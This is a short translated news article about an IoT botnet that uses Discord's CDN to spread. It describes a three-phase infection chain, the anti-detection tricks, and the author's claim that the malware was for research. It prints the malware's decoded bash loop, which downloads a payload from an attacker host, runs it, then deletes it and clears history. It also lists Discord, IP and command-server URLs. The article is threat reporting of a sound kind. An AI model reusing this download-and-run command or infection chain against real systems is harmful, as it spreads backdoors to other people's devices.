Recently examples have been discovered of a new botnet for IoT devices using the Discord CDN for its propagation, which could seriously hamper its blocking.
Security researcher @ 0xrb recently posted a list of URLs on Twitter using the infrastructure of the popular communication tool for a new botnet for IoT devices.
The funny thing about this botnet is that it uses the Discord CDN to dodge the blacklists of IDS devices. It also includes anti-sandbox and anti-detection techniques such as using timeouts, deleting records and using hexadecimal strings as intermediate payloads.
The following describes the infection process:
1-The infection starts by downloading a bash script from the url hxxps: //cdn.discordapp.com/attachments/779820448182960152/780735645169352765/ugyuftyufydurdiytyabins.sh. To upload this file, the attacker used the file sharing feature of the Discord application and copied the link by right-clicking on the shared file.
The script in question downloads a compiled binary file for various platforms. This binary will be executed and later removed.
2- In a second phase, the malware sends a GET request to the URL hxxp: //22.214.171.124//vivid, from which a response is received. This sequence of bytes is executed directly on the computer and does not leave a trace in any file. It is an obfuscation and circumvention technique in which the payload is rendered in hexadecimal format. This is translated directly into a command to be executed by the victim’s bash interpreter:
(as long as true; do (sleep $ ((RANDOM% 200)); (printf (wget -q http://gay.energy//os -O .; chmod 777 .; ./ .; rm -rf .; clear ; clear; history -c)> / dev / null 2> & 1 ″ | bash) &> / dev / null 2> & 1) & sleep 43200; done & disown &)> / dev / null 2> & 1 & clear; clear story -c
The script in question does the following:
-Wait for a certain time (to avoid detection of possible antivirus programs)
– Download the user data from phase 3 from the address http://gay.energy//os
-clean bash story
-In the third phase, the previously downloaded operating system file also consists of a bash script that does the following:
-Create a new user
– Makes requests to a PHP server (hxxp: //gay.energy/WelcomeNewBotBuddy/OwO.php), which registers the new infected device. The registration request includes information about the backdoor installed on the victim’s computer (an SSH server), as well as information about their CPU, RAM, and SWAP.
– Finally, delete the records and bash history.
Another strange fact about this malware is that the author has commented on the subject and is defending it for research purposes. He wanted to test which servers remained infected and undetected the longest.
The author defends that he had no malicious intent and that he wanted to make the analysts’ job easier by leaving the final payload uncovered.
Source: One a day
Copyright © Grupo Edefa SA Reproduction, in whole or in part, of this article is prohibited without the prior authorization of the publisher.